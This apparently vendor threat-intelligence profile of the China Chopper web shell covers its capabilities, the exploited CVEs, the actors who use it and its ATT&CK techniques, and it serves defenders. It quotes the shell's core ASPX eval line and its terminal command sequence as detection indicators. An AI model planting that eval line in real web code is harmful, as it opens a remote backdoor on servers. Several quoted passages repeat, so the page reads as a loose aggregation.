China Chopper
China Chopper is a widely used and widely shared web shell, typically deployed on compromised web servers to provide remote access and control. It operates in a client/server model and is commonly used in web application attacks. The server component executes code sent via HTTP POST requests and has been described as enabling threat actors to transfer and create files, open a command terminal, interact with database servers, spider authentication portals, and change file timestamps. Observed variants include ASPX and PHP implementations, including one-line eval-style shells and a .NET-based variant embedded as a malicious Umbraco CMS module that decoded Base64 data multiple times and dynamically executed JavaScript to provide China Chopper-like functionality.
The malware has been observed following exploitation of public-facing applications and servers, including Microsoft Exchange and SharePoint, WildFly/JBoss, Umbraco CMS, Adobe ColdFusion, and phpMyAdmin/MariaDB log-poisoning scenarios. It has been associated with exploitation activity involving CVE-2019-0604 on SharePoint and Exchange exploitation tied to CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, as well as observed telemetry around CVE-2023-26360. In Exchange incidents, China Chopper web shells were commonly found as ASPX files in IIS and Exchange paths such as \inetpub\wwwroot\aspnet_client\ and FrontEnd\HttpProxy directories.
Multiple threat actors and clusters have used China Chopper, and the content explicitly notes it is not unique to any one group. Reported users include GALLIUM, Tropic Trooper, DragonSpark, BRONZE UNION / TG-3390, BRONZE PRESIDENT, Flax Typhoon, APT41 / Wicked Panda, and Iranian actor Pioneer Kitten / UNC757; it has also been referenced in activity linked to Chinese state-sponsored or China-nexus operations more broadly. Associated follow-on malware and tooling mentioned alongside China Chopper include PlugX, ShadowPad, HyperBro, Gh0st RAT, Poison Ivy, Crowdoor, Cobalt Strike, SparkRAT, Metasploit, Mimikatz, SoftEther VPN, Neo-reGeorg, ByPassGodzilla, Fscan, Swor, and AntSword.
High-confidence behavioral indicators include the virtual terminal request sequence "&echo [S]&cd&echo [E]", ASPX web shell code containing "eval(Request.Item["|"],"unsafe");" with use of the "|" HTTP parameter, and filenames such as error404.aspx. In one campaign, 37 .NET web shell samples matched the pattern App_Web_{8}[a-z0-9].dll. China Chopper has also been used to stage encrypted archives on compromised internet-facing servers prior to exfiltration. Overall, the content characterizes China Chopper as a common post-exploitation web shell used for persistence, command execution, file operations, credential-access support, lateral movement enablement, staging, and long-term access on compromised web infrastructure.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
17 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
In our telemetry, we noticed exploitation attempts of several CVEs (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 in Microsoft Exchange, CVE-2023-26360 in Adobe ColdFusion). Therefore, we believe with moderate confidence that these web shells were dropped by exploiting an existing unpatched vulnerability. According to our telemetry, the newly discovered web shell was also associated with a campaign leveraging CVE-2023-26360 early this year targeting vulnerable servers in the Middle East. | The infection came to our attention in June 2024, when our telemetry gave recurring alerts for a new China Chopper web shell variant... The resulting code resembles the known functionality associated with the China Chopper web shell, a popular web shell used by attackers for remote access and control over compromised web servers.
In our telemetry, we noticed exploitation attempts of several CVEs (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 in Microsoft Exchange, CVE-2023-26360 in Adobe ColdFusion). Therefore, we believe with moderate confidence that these web shells were dropped by exploiting an existing unpatched vulnerability. | The infection came to our attention in June 2024, when our telemetry gave recurring alerts for a new China Chopper web shell variant... The resulting code resembles the known functionality associated with the China Chopper web shell, a popular web shell used by attackers for remote access and control over compromised web servers.
In our telemetry, we noticed exploitation attempts of several CVEs (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 in Microsoft Exchange, CVE-2023-26360 in Adobe ColdFusion). Therefore, we believe with moderate confidence that these web shells were dropped by exploiting an existing unpatched vulnerability. | The infection came to our attention in June 2024, when our telemetry gave recurring alerts for a new China Chopper web shell variant... The resulting code resembles the known functionality associated with the China Chopper web shell, a popular web shell used by attackers for remote access and control over compromised web servers.
In our telemetry, we noticed exploitation attempts of several CVEs (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 in Microsoft Exchange, CVE-2023-26360 in Adobe ColdFusion). Therefore, we believe with moderate confidence that these web shells were dropped by exploiting an existing unpatched vulnerability. | The infection came to our attention in June 2024, when our telemetry gave recurring alerts for a new China Chopper web shell variant... The resulting code resembles the known functionality associated with the China Chopper web shell, a popular web shell used by attackers for remote access and control over compromised web servers.
CVE-2019-0604 Vulnerable Products: Microsoft SharePoint Associated Malware: China Chopper Mitigation: Update affected Microsoft products with the latest security patches | CVE-2019-0604 ... Associated Malware: China Chopper | CVE-2019-0604 Vulnerable Products: Microsoft SharePoint Associated Malware: China Chopper
CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 allow for remote code execution. CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.
Microsoft has released out-of-band security updates to address four vulnerabilities in Exchange Server: CVE-2021-26855 allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via a Server-Side Request Forgery (SSRF).
CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 allow for remote code execution. CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.
CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 allow for remote code execution... CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server.
The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781.
The threat actors then used BEHINDER to install the China Chopper web shell and a simple file upload tool as backups.
PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.
PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.
"In summer 2018, threat actors were observed targeting public-facing web servers that were vulnerable to CVE-2017-3066. The activity was related to a vulnerability in the web application development platform Adobe ColdFusion, which enabled remote code execution."
PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.
PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.
Threat actors are actively exploiting a recently disclosed critical vulnerability, tracked as CVE-2026-1731 (CVSS score: 9.9), in BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA). The bug could allow an unauthenticated attacker to send specially crafted requests and run operating system commands remotely, without logging in.
Groups observed using it
16 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"China Chopper Commonly used and widely shared web shell used by several threat actors. Not unique to GALLIUM."
The infection came to our attention in June 2024, when our telemetry gave recurring alerts for a new China Chopper web shell variant... The resulting code resembles the known functionality associated with the China Chopper web shell, a popular web shell used by attackers for remote access and control over compromised web servers.
Microsoft Exchange Incident “China Chopper” ASPX Webshell filenames ... Unit 42 Analyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells
The group uses a variety of TTPs including but not limited to LoTL tactics, phishing, ransomware, cryptocurrency mining, supply chain attacks, China Chopper, Gh0st RaT, PlugX, HighNoon, Derusbi, BioPass RAT, RedXOR, and ShadowPad.
The group uses a variety of TTPs including but not limited to LoTL tactics, phishing, ransomware, cryptocurrency mining, supply chain attacks, China Chopper, Gh0st RaT, PlugX, HighNoon, Derusbi, BioPass RAT, RedXOR, and ShadowPad.
Threat Group-3390 has moved staged encrypted archives to Internet-facing servers that had previously been compromised with China Chopper prior to exfiltration.
Techniques & procedures
21 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
Initial Access
China Chopper is commonly used by Chinese threat actors, which are known to deploy the webshell through different vectors, such as exploiting web server vulnerabilities, cross-site scripting, or SQL injections. | We observed compromises of web servers and MySQL database servers exposed to the Internet as initial indicators of the DragonSpark attacks.
Execution
4 techniques
Execution
__Render__control1() is the main malicious function... a Base64 string is decoded and then executed via dynamic evaluation using JavaScript.
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
China Chopper is commonly used by Chinese threat actors, which are known to deploy the webshell through different vectors, such as exploiting web server vulnerabilities, cross-site scripting, or SQL injections.
U.S. Government reporting has identified the top 10 most exploited vulnerabilities by state, nonstate, and unattributed cyber actors from 2016 to 2019 as follows: CVE-2017-11882, CVE-2017-0199, CVE-2017-5638, CVE-2012-0158, CVE-2019-0604, CVE-2017-0143, CVE-2018-4878, CVE-2017-8759, CVE-2015-1641, and CVE-2018-7600.
Persistence
2 techniques
Persistence
Stealth
3 techniques
Stealth
The module exhibits characteristics commonly associated with malicious activity, including obfuscation and dynamic execution of commands... a Base64 string is decoded and then executed via dynamic evaluation using JavaScript.
Once the attackers gained access to the network, they deleted the .aspx webshell file to cover their tracks
APT28 has performed timestomping on victim files. APT29 has used timestomping to alter the Standard Information timestamps on their web shells to match other files in the same directory. APT32 has used scheduled task raw XML with a backdated timestamp... APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host.
Discovery
4 techniques
Discovery
adding attack.discovery since rule already have tags t1018, t1033 & t1087.
The content repeatedly describes threat actors and malware performing network scanning, port scanning, service enumeration, OS fingerprinting, and identifying open ports/services across victim environments.
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
Collection
1 technique
Collection
Command and Control
4 techniques
Command and Control
BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control (C2) and operational infrastructure. The threat actors also integrate infrastructure they likely previously compromised for espionage purposes.
The content repeatedly describes threat actors and malware using HTTP and HTTPS for command and control, such as: "Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests."
Webshells are utilized for the following purposes: To use as a relay point to issue commands to hosts inside the network without direct internet access;
GALLIUM relies on web shells to gain persistence within a target's network and to drop their second stage malware payloads instead of first stage installers... This tool can be used by the attackers for a variety of purposes and tasks including ... exfiltrating and dropping files.
IOCs tracked for this family
39 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
81 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A web shell/backdoor cited as a commonly reused tool in Chinese state-sponsored intrusions, especially relevant to external-facing server compromise.
The group uses a variety of TTPs including but not limited to LoTL tactics, phishing, ransomware, cryptocurrency mining, supply chain attacks, China Chopper, Gh0st RaT, PlugX, HighNoon, Derusbi, BioPass RAT, RedXOR, and ShadowPad.
Web shell family referenced as a tooling marker; used for remote command execution and as a C2/access mechanism via web server compromise.
A lightweight web shell used for remote access and control of compromised web servers, commonly used for initial foothold and persistent access.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.